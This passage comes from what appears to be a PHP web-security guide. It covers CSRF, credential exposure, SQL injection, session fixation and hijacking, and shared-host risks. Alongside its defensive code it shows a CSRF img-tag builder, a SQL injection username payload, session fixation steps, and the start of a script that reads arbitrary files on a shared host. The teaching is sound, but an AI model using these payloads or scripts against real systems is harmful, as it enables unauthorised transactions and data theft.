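        $headers[$name] = trim($value);
    }

    return array(
        'method'  => $method,
        'url'     => $url,
        'version' => $version,
        'headers' => $headers,
    );
}

$raw = "GET / HTTP/1.1\r\n"
     . "Host: example.org\r\n"
     . "User-Agent: Mozilla/5.0 Gecko\r\n"
     . "Accept: text/xml, image/png, image/jpeg, image/gif, */*\r\n\r\n";

$parsed = parse_http_request($raw);

?>]]>
</programlisting>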
<para>You might be familiar with accessing this information in PHP. For
example, the following code can be used to rebuild this particular HTTP
request in a string:</para>
<programlisting>
<![CDATA[<?php

$request = '';
$request .= "{$_SERVER['REQUEST_METHOD']} ";
$request .= "{$_SERVER['REQUEST_URI']} ";
$request .= "{$_SERVER['SERVER_PROTOCOL']}\r\n";
$request .= "Host: {$_SERVER['HTTP_HOST']}\r\n";
$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
$request .= "Accept: {$_SERVER['HTTP_ACCEPT']}\r\n\r\n";

?>]]>
</programlisting>
<para>An example response to the previous request is as follows:</para>
<programlisting>
<![CDATA[HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 57

<html>
<img src="http://example.org/image.png" />
</html>]]>
</programlisting>
<para>The content of a response is what you see when you view source in a
browser. The <literal>img</literal> tag in this particular response alerts the
browser to the fact that another resource (an image) is necessary to properly
render the page. The browser requests this resource as it would any other, and
the following is an example of such a request:</para>
<programlisting>
<![CDATA[GET /image.png HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*]]>
</programlisting>
<para>This is worthy of attention. The browser requests the URL specified in
the <literal>src</literal> attribute of the <literal>img</literal> tag just as
if the user had manually navigated there. The browser has no way to
specifically indicate that it expects an image.</para>
<para>Combine this with what you've learned about forms, and then consider a
URL similar to the following:</para>
<programlisting>
<![CDATA[http://stocks.example.org/buy.php?symbol=SCOX&quantity=1000]]>
</programlisting>
<para>A form submission that uses the <literal>GET</literal> method can
potentially be indistinguishable from an image request - both could be
requests for the same URL. If <literal>register_globals</literal> is enabled,
the method of the form isn't even important (unless the developer still uses
<literal>$_POST</literal> and the like). Hopefully the dangers are already
becoming clear.</para>
<para>Another characteristic that makes CSRF so powerful is that any cookies
pertaining to a URL are included in the request for that URL. A user who has
an established relationship with <literal>stocks.example.org</literal> (such
as being logged in) can potentially buy <literal>1000</literal> shares of
<literal>SCOX</literal> by visiting a page with an <literal>img</literal> tag
that specifies the URL in the previous example.</para>
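<para>As a rough sketch of how little is required, the following code builds
such an <literal>img</literal> tag. The variable names are only illustrative,
and the URL is the hypothetical one shown earlier:</para>
<programlisting>
<![CDATA[<?php

/* Hypothetical parameters taken from the example URL */
$params = array('symbol' => 'SCOX', 'quantity' => 1000);

$url = 'http://stocks.example.org/buy.php?' . http_build_query($params, '', '&');

/* Escape the URL for use in an HTML attribute */
$tag = '<img src="' . htmlspecialchars($url, ENT_QUOTES) . '" />';

echo $tag, "\n";

?>]]>
</programlisting>
<para>Any page that a logged-in user visits can contain this tag, and the
browser requests the URL without any further action from the user.</para>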
<para>Consider the following form located (hypothetically) at
<literal>http://stocks.example.org/form.html</literal>:</para>
<programlisting>
<![CDATA[<p>Buy Stocks Instantly!</p>
<form action="/buy.php">
<p>Symbol: <input type="text" name="symbol" /></p>
<p>Quantity: <input type="text" name="quantity" /></p>
<input type="submit" />
</form>]]>
</programlisting>
<para>If the user enters <literal>SCOX</literal> for the symbol,
<literal>1000</literal> as the quantity, and submits the form, the request
that is sent by the browser is similar to the following:</para>
<programlisting>
<![CDATA[GET /buy.php?symbol=SCOX&quantity=1000 HTTP/1.1
Host: stocks.example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234]]>
</programlisting>
<para>I include a <literal>Cookie</literal> header in this example to
illustrate the application using a cookie for the session identifier. If an
<literal>img</literal> tag references the same URL, the same cookie will be
sent in the request for that URL, and the server processing the request will
be unable to distinguish this from an actual order.</para>
<para>There are a few things you can do to protect your applications against
CSRF:</para>
<itemizedlist>
    <listitem>
        <para>Use <literal>POST</literal> rather than <literal>GET</literal>
        in forms. Specify <literal>POST</literal> in the method attribute of
        your forms. Of course, this isn't appropriate for all of your forms,
        but it is appropriate when a form is performing an action, such as
        buying stocks. In fact, the HTTP specification states that
        <literal>GET</literal> requests should be safe, meaning that they
        should do nothing other than retrieve information.</para>
    </listitem>
    <listitem>
        <para>Use <literal>$_POST</literal> rather than rely on
        <literal>register_globals</literal>. Using the <literal>POST</literal>
        method for form submissions is useless if you rely on
        <literal>register_globals</literal> and reference form variables like
        <literal>$symbol</literal> and <literal>$quantity</literal>. It is
        also useless if you use <literal>$_REQUEST</literal>.</para>
    </listitem>
    <listitem>
        <para>Do not focus on convenience.</para>
        <para>While it seems desirable to make a user's experience as
        convenient as possible, too much convenience can have serious
        consequences. While "one-click" approaches can be made very secure, a
        simple implementation is likely to be vulnerable to CSRF.</para>
    </listitem>
    <listitem>
        <para>Force the use of your own forms.</para>
        <para>The biggest problem with CSRF is having requests that look like
        form submissions but aren't. If a user has not requested the page with
        the form, should you assume a request that looks like a submission of
        that form to be legitimate and intended?</para>
    </listitem>
</itemizedlist>
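<para>The first two guidelines can be sketched as follows. This is only an
illustration under stated assumptions: the function name
<literal>get_order()</literal> and the filtering rules (letters for the
symbol, digits for the quantity) are hypothetical and not part of any real
application.</para>
<programlisting>
<![CDATA[<?php

/*
 * Hypothetical helper: returns the filtered order, or NULL if the
 * request is not a POST submission with the expected fields.
 */
function get_order($server, $post)
{
    /* Actions such as buying stocks must arrive via POST */
    if (!isset($server['REQUEST_METHOD']) || $server['REQUEST_METHOD'] != 'POST')
    {
        return NULL;
    }

    /* Read from $_POST only, never $_REQUEST or global variables */
    if (!isset($post['symbol'], $post['quantity'])
        || !is_string($post['symbol'])
        || !is_string($post['quantity']))
    {
        return NULL;
    }

    /* Assumed rules: letters for the symbol, digits for the quantity */
    if (!ctype_alpha($post['symbol']) || !ctype_digit($post['quantity']))
    {
        return NULL;
    }

    return array('symbol'   => $post['symbol'],
                 'quantity' => (int) $post['quantity']);
}

$order = get_order($_SERVER, $_POST);

?>]]>
</programlisting>
<para>This alone does not stop a forged <literal>POST</literal> request. It
only ensures that a simple <literal>img</literal> tag can no longer place an
order.</para>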
<para>Now we can write an even more secure message board:</para>
<programlisting>
<![CDATA[<?php

$token = md5(time());

$fp = fopen('./tokens.txt', 'a');
fwrite($fp, "$token\n");
fclose($fp);

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

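/* Strip the trailing newline from each stored token */
$tokens = file('./tokens.txt', FILE_IGNORE_NEW_LINES);

if (isset($_POST['token']) && in_array($_POST['token'], $tokens))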
{
    if (isset($_POST['message']))
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

readfile('./messages.txt');

?>]]>
</programlisting>
<para>This message board still has a few security vulnerabilities. Can you
spot them?</para>
<para>Time is extremely predictable. Using the MD5 digest of a timestamp is a
poor excuse for a random number. Better functions include
<literal>uniqid()</literal> and <literal>rand()</literal>, although neither is
cryptographically secure. Where it is available (PHP 7 and later),
<literal>random_bytes()</literal> is a stronger choice.</para>
<para>More importantly, it is trivial for an attacker to obtain a valid token.
Simply visiting this page generates a valid token and includes it in the
source. With a valid token, the attack is as simple as before the token
requirement was added.</para>
<para>Here is an improved message board:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (isset($_POST['message'], $_POST['token'], $_SESSION['token']))
{
    if ($_POST['token'] === $_SESSION['token'])
    {
        $message = htmlentities($_POST['message']);

        $fp = fopen('./messages.txt', 'a');
        fwrite($fp, "$message<br />");
        fclose($fp);
    }
}

$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;

?>

<form method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<input type="text" name="message"><br />
<input type="submit">
</form>

<?php

readfile('./messages.txt');

?>]]>
</programlisting>
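<para>On PHP 7 or later (an assumption, since the examples above predate it),
the token can instead be generated with <literal>random_bytes()</literal> and
compared with <literal>hash_equals()</literal>, which compares strings in
constant time. The following is a minimal sketch, and both function names are
hypothetical:</para>
<programlisting>
<![CDATA[<?php

/* Hypothetical helper: 32 hexadecimal characters from a secure source */
function generate_token()
{
    return bin2hex(random_bytes(16));
}

/* Hypothetical helper: constant-time comparison of the two tokens */
function token_is_valid($submitted, $stored)
{
    return is_string($submitted)
        && is_string($stored)
        && hash_equals($stored, $submitted);
}

$token = generate_token();

?>]]>
</programlisting>
<para>In the message board, <literal>generate_token()</literal> would replace
the call to <literal>md5()</literal>, and
<literal>token_is_valid($_POST['token'], $_SESSION['token'])</literal> would
replace the comparison.</para>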
</sect1>
</chapter>

<chapter id="DATABASES-AND-SQL">
<title>Databases and SQL</title>

<sect1 id="EXPOSED-ACCESS-CREDENTIALS">
<title>Exposed Access Credentials</title>
<para>Most PHP applications interact with a database. This usually involves
connecting to a database server and using access credentials to
authenticate:</para>
<programlisting>
<![CDATA[<?php

$host = 'example.org';
$username = 'myuser';
$password = 'mypass';

$db = mysql_connect($host, $username, $password);

?>]]>
</programlisting>
<para>This could be an example of a file called <literal>db.inc</literal> that
is included whenever a connection to the database is needed. This approach is
convenient, and it keeps the access credentials in a single file.</para>
<para>Potential problems arise when this file is somewhere within document
root. This is a common approach, because it makes <literal>include</literal>
and <literal>require</literal> statements much simpler, but it can lead to
situations that expose your access credentials.</para>
<para>Remember that everything within document root has a URL associated with
it. For example, if document root is
<literal>/usr/local/apache/htdocs</literal>, then a file located at
<literal>/usr/local/apache/htdocs/inc/db.inc</literal> has a URL such as
<literal>http://example.org/inc/db.inc</literal>.</para>
<para>Combine this with the fact that most web servers will serve
<literal>.inc</literal> files as plaintext, and the risk of exposing your
access credentials should be clear. A bigger problem is that any source code
in these modules can be exposed, but access credentials are particularly
sensitive.</para>
<para>Of course, one simple solution is to place all modules outside of
document root, and this is a good practice. Both <literal>include</literal>
and <literal>require</literal> can accept a filesystem path, so there's no
need to make modules accessible via URL. It is an unnecessary risk.</para>
<para>If you have no choice in the placement of your modules, and they must be
within document root, you can put something like the following in your
<literal>httpd.conf</literal> file (assuming Apache):</para>
<programlisting>
<![CDATA[<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>]]>
</programlisting>
<para>It is not a good idea to have your modules processed by the PHP engine.
This includes renaming your modules with a <literal>.php</literal> extension
as well as using <literal>AddType</literal> to have <literal>.inc</literal>
files treated as PHP files. Executing code out of context can be very
dangerous, because it's unexpected and can lead to unknown results. However,
if your modules consist of only variable assignments (as an example), this
particular risk is mitigated.</para>
<para>My favorite method for protecting your database access credentials is
described in the PHP Cookbook (O'Reilly) by David Sklar and Adam Trachtenberg.
Create a file, <literal>/path/to/secret-stuff</literal>, that only
<literal>root</literal> can read (not <literal>nobody</literal>):</para>
<programlisting>
<![CDATA[SetEnv DB_USER "myuser"
SetEnv DB_PASS "mypass"]]>
</programlisting>
<para>Include this file within <literal>httpd.conf</literal> as
follows:</para>
<programlisting>
<![CDATA[Include "/path/to/secret-stuff"]]>
</programlisting>
<para>Now you can use <literal>$_SERVER['DB_USER']</literal> and
<literal>$_SERVER['DB_PASS']</literal> in your code. Not only do you never
have to write your username and password in any of your scripts, the web
server can't read the <literal>secret-stuff</literal> file, so no other users
can write scripts to read your access credentials (regardless of language).
Just be careful not to expose these variables with something like
<literal>phpinfo()</literal> or <literal>print_r($_SERVER)</literal>.</para>
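<para>As a small sketch of how a script might consume these variables, the
following helper reads them and reports a missing configuration without ever
echoing the values. The function name <literal>db_credentials()</literal> is
my own invention for illustration:</para>
<programlisting>
<![CDATA[<?php

/* Hypothetical helper: fetch the credentials provided by SetEnv */
function db_credentials($server)
{
    if (empty($server['DB_USER']) || !isset($server['DB_PASS']))
    {
        /* Report the failure without revealing any values */
        return FALSE;
    }

    return array($server['DB_USER'], $server['DB_PASS']);
}

$credentials = db_credentials($_SERVER);

if ($credentials !== FALSE)
{
    list($db_user, $db_pass) = $credentials;

    /* Pass $db_user and $db_pass to your database connection function */
}

?>]]>
</programlisting>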
</sect1>

<sect1 id="SQL-INJECTION">
<title>SQL Injection</title>
<para>SQL injection attacks are extremely simple to defend against, but many
applications are still vulnerable. Consider the following SQL
statement:</para>
<programlisting>
<![CDATA[<?php

$sql = "INSERT
        INTO   users (reg_username,
                      reg_password,
                      reg_email)
        VALUES ('{$_POST['reg_username']}',
                '$reg_password',
                '{$_POST['reg_email']}')";

?>]]>
</programlisting>
<para>This query is constructed with <literal>$_POST</literal>, which should
immediately look suspicious.</para>
<para>Assume that this query is creating a new account. The user provides a
desired username and an email address. The registration application generates
a temporary password and emails it to the user to verify the email address.
Imagine that the user enters the following as a username:</para>
<programlisting>
<![CDATA[bad_guy', 'mypass', ''), ('good_guy]]>
</programlisting>
<para>This certainly doesn't look like a valid username, but with no data
filtering in place, the application can't tell. If a valid email address is
given (<literal>shiflett@php.net</literal>, for example), and
<literal>1234</literal> is what the application generates for the password,
the SQL statement becomes the following:</para>
<programlisting>
<![CDATA[<?php

$sql = "INSERT
        INTO   users (reg_username,
                      reg_password,
                      reg_email)
        VALUES ('bad_guy', 'mypass', ''), ('good_guy',
                '1234',
                'shiflett@php.net')";

?>]]>
</programlisting>
<para>Rather than the intended action of creating a single account
(<literal>good_guy</literal>) with a valid email address, the application has
been tricked into creating two accounts, and the user supplied every detail of
the <literal>bad_guy</literal> account.</para>
<para>While this particular example might not seem so harmful, it should be
clear that worse things could happen once an attacker can make modifications
to your SQL statements.</para>
<para>For example, depending on the database you are using, it might be
possible to send multiple queries to the database server in a single call.
Thus, a user can potentially terminate the existing query with a semicolon and
follow this with a query of the user's choosing.</para>
<para>Until recently, MySQL did not allow multiple queries, so this
particular risk was mitigated. Newer versions of MySQL allow multiple queries,
but the corresponding PHP extension (<literal>ext/mysqli</literal>) requires
that you use a separate function if you want to send multiple queries
(<literal>mysqli_multi_query()</literal> instead of
<literal>mysqli_query()</literal>). Only allowing a single query is safer,
because it limits what an attacker can potentially do.</para>
<para>Protecting against SQL injection is easy:</para>
<itemizedlist>
    <listitem>
        <para>Filter your data.</para>
        <para>This cannot be overstressed. With good data filtering in place,
        most security concerns are mitigated, and some are practically
        eliminated.</para>
    </listitem>
    <listitem>
        <para>Quote your data.</para>
        <para>If your database allows it (MySQL does), put single quotes
        around all values in your SQL statements, regardless of the data
        type.</para>
    </listitem>
    <listitem>
        <para>Escape your data.</para>
        <para>Sometimes valid data can unintentionally interfere with the
        format of the SQL statement itself. Use
        <literal>mysql_real_escape_string()</literal> or an escaping function
        native to your particular database. If there isn't a specific one,
        <literal>addslashes()</literal> is a last resort.</para>
    </listitem>
</itemizedlist>
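<para>The filtering step might look something like the following for the
registration example. This is a sketch under stated assumptions: the function
name <literal>filter_registration()</literal> is hypothetical, and so is the
rule that a username consists of 1 to 32 letters, digits, and
underscores.</para>
<programlisting>
<![CDATA[<?php

/*
 * Hypothetical filter: returns the clean data, or FALSE if any field
 * fails. The username rule is an assumption made for this example.
 */
function filter_registration($post)
{
    if (!isset($post['reg_username'], $post['reg_email'])
        || !is_string($post['reg_username'])
        || !is_string($post['reg_email']))
    {
        return FALSE;
    }

    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/D', $post['reg_username']))
    {
        return FALSE;
    }

    if (filter_var($post['reg_email'], FILTER_VALIDATE_EMAIL) === FALSE)
    {
        return FALSE;
    }

    return array('reg_username' => $post['reg_username'],
                 'reg_email'    => $post['reg_email']);
}

$clean = filter_registration($_POST);

/* Only values from $clean, quoted and escaped, belong in the SQL */

?>]]>
</programlisting>
<para>With this filter in place, the malicious username shown earlier is
rejected before any SQL is built. Escaping is still necessary, because data
that passes a filter (an email address, for example) may still contain
characters that are special in SQL.</para>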
</sect1>
</chapter>

<chapter id="SESSIONS">
<title>Sessions</title>

<sect1 id="SESSION-FIXATION">
<title>Session Fixation</title>
<para>Session security is a sophisticated topic, and it's no surprise that
sessions are a frequent target of attack. Most session attacks involve
impersonation, where the attacker attempts to gain access to another user's
session by posing as that user.</para>
<para>The most crucial piece of information for an attacker is the session
identifier, because this is required for any impersonation attack. There are
three common methods used to obtain a valid session identifier:</para>
<itemizedlist>
    <listitem><para>Prediction</para></listitem>
    <listitem><para>Capture</para></listitem>
    <listitem><para>Fixation</para></listitem>
</itemizedlist>
<para>Prediction refers to guessing a valid session identifier. With PHP's
native session mechanism, the session identifier is sufficiently random that
prediction is unlikely to be the weakest point in your implementation.</para>
<para>Capturing a valid session identifier is the most common type of session
attack, and there are numerous approaches. Because session identifiers are
typically propagated in cookies or as <literal>GET</literal> variables, the
different approaches focus on attacking these methods of transfer. While there
have been a few browser vulnerabilities regarding cookies, these have mostly
been in Internet Explorer, and cookies are slightly less exposed than
<literal>GET</literal> variables. Thus, for those users who enable cookies,
you can provide them with
a more secure mechanism by using a cookie to propagate the session
identifier.</para>
<para>Fixation is the simplest method of obtaining a valid session identifier.
While it's not very difficult to defend against, if your session mechanism
consists of nothing more than <literal>session_start()</literal>, you are
vulnerable.</para>
<para>In order to demonstrate session fixation, I will use the following
script, <literal>session.php</literal>:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (!isset($_SESSION['visits']))
{
    $_SESSION['visits'] = 1;
}
else
{
    $_SESSION['visits']++;
}

echo $_SESSION['visits'];

?>]]>
</programlisting>
<para>Upon first visiting the page, you should see <literal>1</literal> output
to the screen. On each subsequent visit, this should increment to reflect how
many times you have visited the page.</para>
<para>To demonstrate session fixation, first make sure that you do not have an
existing session identifier (perhaps delete your cookies), then visit this
page with <literal>?PHPSESSID=1234</literal> appended to the URL. Next, with a
completely different browser (or even a completely different computer), visit
the same URL again with <literal>?PHPSESSID=1234</literal> appended. You will
notice that you do not see <literal>1</literal> output on your first visit,
but rather it continues the session you previously initiated.</para>
<para>Why can this be problematic? Most session fixation attacks simply use a
link or a protocol-level redirect to send a user to a remote site with a
session identifier appended to the URL. The user likely won't notice, since
the site will behave exactly the same. Because the attacker chose the session
identifier, it is already known, and this can be used to launch impersonation
attacks such as session hijacking.</para>
<para>A simplistic attack such as this is quite easy to prevent. If there
isn't an active session associated with a session identifier that the user is
presenting, then regenerate it just to be sure:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (!isset($_SESSION['initiated']))
{
    session_regenerate_id();
    $_SESSION['initiated'] = true;
}

?>]]>
</programlisting>
<para>The problem with such a simplistic defense is that an attacker can
simply initialize a session for a particular session identifier, and then use
that identifier to launch the attack.</para>
<para>To protect against this type of attack, first consider that session
hijacking is only really useful after the user has logged in or otherwise
obtained a heightened level of privilege. So, if we modify the approach to
regenerate the session identifier whenever there is any change in privilege
level (for example, after verifying a username and password), we will have
practically eliminated the risk of a successful session fixation
attack.</para>
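<para>A minimal sketch of this approach follows. The function name
<literal>grant_login()</literal> and the session keys are hypothetical, and
the sketch assumes that <literal>session_start()</literal> has already been
called and that the username and password have already been verified:</para>
<programlisting>
<![CDATA[<?php

/*
 * Hypothetical helper: call this only after the username and password
 * have been verified, and only after session_start().
 */
function grant_login($username)
{
    /* The privilege level is changing, so abandon the old identifier */
    session_regenerate_id(true);

    $_SESSION['username'] = $username;
    $_SESSION['logged_in'] = true;
}

?>]]>
</programlisting>
<para>Because the identifier changes at the moment of login, an identifier
that an attacker fixed beforehand no longer refers to the authenticated
session.</para>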
</sect1>

<sect1 id="SESSION-HIJACKING">
<title>Session Hijacking</title>
<para>Arguably the most common session attack, session hijacking refers to all
attacks that attempt to gain access to another user's session.</para>
<para>As with session fixation, if your session mechanism only consists of
<literal>session_start()</literal>, you are vulnerable, although the exploit
isn't as simple.</para>
<para>Rather than focusing on how to keep the session identifier from being
captured, I am going to focus on how to make such a capture less problematic.
The goal is to complicate impersonation, since every complication increases
security. To do this, we will examine the steps necessary to successfully
hijack a session. In each scenario, we will assume that the session identifier
has been compromised.</para>
<para>With the most simplistic session mechanism, a valid session identifier
is all that is needed to successfully hijack a session. In order to improve
this, we need to see if there is anything extra in an HTTP request that we can
use for extra identification.</para>
<note><para>It is unwise to rely on anything at the TCP/IP level, such as IP
address, because these are lower-level protocols that are not intended to
accommodate activities taking place at the HTTP level. A single user can
potentially have a different IP address for each request, and multiple users
can potentially have the same IP address.</para></note>
<para>Recall a typical HTTP request:</para>
<programlisting>
<![CDATA[GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234]]>
</programlisting>
<para>Only the <literal>Host</literal> header is required by
<literal>HTTP/1.1</literal>, so it seems unwise to rely on anything else.
However, consistency is really all we need, because we're only interested in
complicating impersonation without adversely affecting legitimate
users.</para>
<para>Imagine that the previous request is followed by a request with a
different <literal>User-Agent</literal>:</para>
<programlisting>
<![CDATA[GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234]]>
</programlisting>
<para>Although the same cookie is presented, should it be assumed that this is
the same user? It seems highly unlikely that a browser would change the
<literal>User-Agent</literal> header between requests, right? Let's modify the
session mechanism to perform an extra check:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (isset($_SESSION['HTTP_USER_AGENT']))
{
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
    {
        /* Prompt for password */
        exit;
    }
}
else
{
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}

?>]]>
</programlisting>
<para>Now an attacker must not only present a valid session identifier, but
also the correct <literal>User-Agent</literal> header that is associated with
the session. This complicates things slightly, and it is therefore a bit more
secure.</para>
<para>Can we improve this? Consider that the most common method used to obtain
cookie values is by exploiting a vulnerable browser such as Internet Explorer.
These exploits involve the victim visiting the attacker's site, so the
attacker will be able to obtain the correct <literal>User-Agent</literal>
header. Something additional is necessary to protect against this
situation.</para>
<para>Imagine if we required the user to pass the MD5 of the
<literal>User-Agent</literal> in each request. An attacker could no longer
succeed by recreating only the headers that the victim's requests contain; it
would also be necessary to pass this extra bit of information. While guessing
the construction of this particular token isn't too difficult, we can
complicate such guesswork by adding a secret string to the way we construct
the token:</para>
<programlisting>
<![CDATA[<?php

$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';

/* Add any other data that is consistent */

$fingerprint = md5($string);

?>]]>
</programlisting>
<para>Keeping in mind that we're passing the session identifier in a cookie,
and this already requires that an attack be used to compromise this cookie
(and likely all HTTP headers as well), we should pass this fingerprint as a
URL variable. This must be in all URLs as if it were the session identifier,
because both should be required in order for a session to be automatically
continued (in addition to all checks passing).</para>
<para>In order to make sure that legitimate users aren't treated like
criminals, simply prompt for a password if a check fails. If there is an error
in your mechanism that incorrectly suspects a user of an impersonation attack,
prompting for a password before continuing is the least offensive way to
handle the situation. In fact, your users may appreciate the extra bit of
protection perceived from such a query.</para>
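<para>The checks described above might be combined as in the following sketch.
The names here are assumptions made for illustration: the URL variable is
called <literal>fp</literal>, the fingerprint is assumed to have been stored
in <literal>$_SESSION['fingerprint']</literal> when the session was
established, and both function names are hypothetical.</para>
<programlisting>
<![CDATA[<?php

/* Hypothetical secret string; choose your own */
define('FINGERPRINT_SECRET', 'SHIFLETT');

function fingerprint($user_agent)
{
    return md5($user_agent . FINGERPRINT_SECRET);
}

/*
 * Returns TRUE if the session may continue automatically, or FALSE if
 * the user should be prompted for a password.
 */
function fingerprint_matches($session, $server, $get)
{
    if (!isset($session['fingerprint'], $server['HTTP_USER_AGENT'], $get['fp'])
        || !is_string($get['fp']))
    {
        return FALSE;
    }

    $expected = fingerprint($server['HTTP_USER_AGENT']);

    /* Both the stored and the submitted fingerprint must match */
    return $session['fingerprint'] === $expected && $get['fp'] === $expected;
}

?>]]>
</programlisting>
<para>A page would call
<literal>fingerprint_matches($_SESSION, $_SERVER, $_GET)</literal> after
<literal>session_start()</literal> and prompt for a password whenever it
returns <literal>FALSE</literal>.</para>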
<para>There are many different methods you can use to complicate impersonation
and protect your applications from session hijacking. Hopefully you will at
least do something in addition to <literal>session_start()</literal> as well
as be able to come up with a few ideas of your own. Just remember to make
things difficult for the bad guys and easy for the good guys.</para>
<note><para>Some experts claim that the <literal>User-Agent</literal> header
is not consistent enough to be used in the way described. The argument is that
an HTTP proxy in a cluster can modify the <literal>User-Agent</literal> header
inconsistently with other proxies in the same cluster. While I have never
observed this myself (and feel comfortable relying on the consistency of
<literal>User-Agent</literal>), it is something you may want to
consider.</para>
<para>The <literal>Accept</literal> header has been known to change from
request to request in Internet Explorer (depending on whether the user
refreshes the browser), so this should not be relied upon for
consistency.</para></note>
</sect1>
</chapter>

<chapter id="SHARED-HOSTS">
<title>Shared Hosts</title>

<sect1 id="EXPOSED-SESSION-DATA">
<title>Exposed Session Data</title>
<para>When on a shared host, security simply isn't going to be as strong as
when on a dedicated host. This is one of the tradeoffs for the inexpensive
fee.</para>
<para>One particularly vulnerable aspect of shared hosting is having a shared
session store. By default, PHP stores session data in <literal>/tmp</literal>,
and this is true for everyone. You will find that most people stick with the
default behavior for many things, and sessions are no exception. Luckily, not
just anyone can read session files, because they are only readable by the web
server:</para>
<programlisting>
<![CDATA[$ ls -l /tmp
total 12
-rw-------  1  nobody  nobody  123 May 21 12:34 sess_dc8417803c0f12c5b2e39477dc371462
-rw-------  1  nobody  nobody  123 May 21 12:34 sess_46c83b9ae5e506b8ceb6c37dc9a3f66e
-rw-------  1  nobody  nobody  123 May 21 12:34 sess_9c57839c6c7a6ebd1cb45f7569d1ccfc
$]]>
</programlisting>
<para>Unfortunately, it is pretty trivial to write a PHP script to read these
files, and because it runs as the user <literal>nobody</literal> (or whatever
user the web server uses), it has the necessary privileges.</para>
<para>The <literal>safe_mode</literal> directive can prevent this and similar
safety concerns, but since it only applies to PHP, it doesn't address the
root cause of the problem. Attackers can simply use other languages.</para>
<para>What's a better solution? Don't use the same session store as everyone
else. Preferably, store your sessions in a database where the access
credentials are unique to your account. To do this, simply use the
<literal>session_set_save_handler()</literal> function to override PHP's
default session handling with your own PHP functions.</para>
<para>The following code shows a simplistic example for storing sessions in a
database:</para>
<programlisting>
<![CDATA[<?php

session_set_save_handler('_open',
                         '_close',
                         '_read',
                         '_write',
                         '_destroy',
                         '_clean');

function _open()
{
  global $_sess_db;

  $db_user = $_SERVER['DB_USER'];
  $db_pass = $_SERVER['DB_PASS'];
  $db_host = 'localhost';
    
  if ($_sess_db = mysql_connect($db_host, $db_user, $db_pass))
  {
    return mysql_select_db('sessions', $_sess_db);
  }
    
  return FALSE;
}

function _close()
{
  global $_sess_db;
    
  return mysql_close($_sess_db);
}

function _read($id)
{
  global $_sess_db;

  $id = mysql_real_escape_string($id);

  $sql = "SELECT data
          FROM   sessions
          WHERE  id = '$id'";

  if ($result = mysql_query($sql, $_sess_db))
  {
    if (mysql_num_rows($result))
    {
      $record = mysql_fetch_assoc($result);

      return $record['data'];
    }
  }

  return '';
}

function _write($id, $data)
{   
  global $_sess_db;

  $access = time();

  $id = mysql_real_escape_string($id);
  $access = mysql_real_escape_string($access);
  $data = mysql_real_escape_string($data);

  $sql = "REPLACE 
          INTO    sessions
          VALUES  ('$id', '$access', '$data')";

  return mysql_query($sql, $_sess_db);
}

function _destroy($id)
{
  global $_sess_db;
    
  $id = mysql_real_escape_string($id);

  $sql = "DELETE
          FROM   sessions
          WHERE id = '$id'";

  return mysql_query($sql, $_sess_db);
}

function _clean($max)
{
  global $_sess_db;
    
  $old = time() - $max;
  $old = mysql_real_escape_string($old);

  $sql = "DELETE
          FROM   sessions
          WHERE  access < '$old'";

  return mysql_query($sql, $_sess_db);
}

?>]]>
</programlisting>
<para>This requires an existing table named <literal>sessions</literal>, whose
format is as follows:</para>
<programlisting>
<![CDATA[mysql> DESCRIBE sessions;
+--------+------------------+------+-----+---------+-------+
| Field  | Type             | Null | Key | Default | Extra |
+--------+------------------+------+-----+---------+-------+
| id     | varchar(32)      |      | PRI |         |       |
| access | int(10) unsigned | YES  |     | NULL    |       |
| data   | text             | YES  |     | NULL    |       |
+--------+------------------+------+-----+---------+-------+]]>
</programlisting>
<para>This table can be created in MySQL with the following syntax:</para>
<programlisting>
<![CDATA[CREATE TABLE sessions
(
    id varchar(32) NOT NULL,
    access int(10) unsigned,
    data text,
    PRIMARY KEY (id)
);]]>
</programlisting>
<para>Storing your sessions in a database places the trust in the security of
your database. Recall the lessons learned when we spoke about databases and
SQL, because they are applicable here.</para>
</sect1>

<sect1 id="BROWSING-THE-FILESYSTEM">
<title>Browsing the Filesystem</title>
<para>Just for fun, let's look at a script that browses the filesystem:</para>
<programlisting>
<![CDATA[<?php

echo "<pre>\n";

if (ini_get('safe_mode'))
{
    echo "[safe_mode enabled]\n\n";
}
else
{
    echo "[safe_mode disabled]\n\n";
}

if (isset($_GET['dir']))
{
    ls($_GET['dir']);
}
elseif (isset($_GET['file']))
{
    cat($_GET['file']);
}
else
{
    ls('/');
}

echo "</pre>\n";

function ls($dir)
{
    $handle = dir($dir);

    /* Compare against false so that a file named "0" does not end the loop */
    while (false !== ($filename = $handle->read()))
    {
        $size = filesize("$dir$filename");

        if (is_dir("$dir$filename"))
        {
            if (is_readable("$dir$filename"))
            {
                $line = str_pad($size, 15);
                $line .= "<a href=\"{$_SERVER['PHP_SELF']}?dir=$dir$filename/\">$filename/</a>";
            }
            else
            {
                $line = str_pad($size, 15);
                $line .= "$filename/";
            }
        }
        else
        {
            if (is_readable("$dir$filename"))
            {
                $line = str_pad($size, 15);
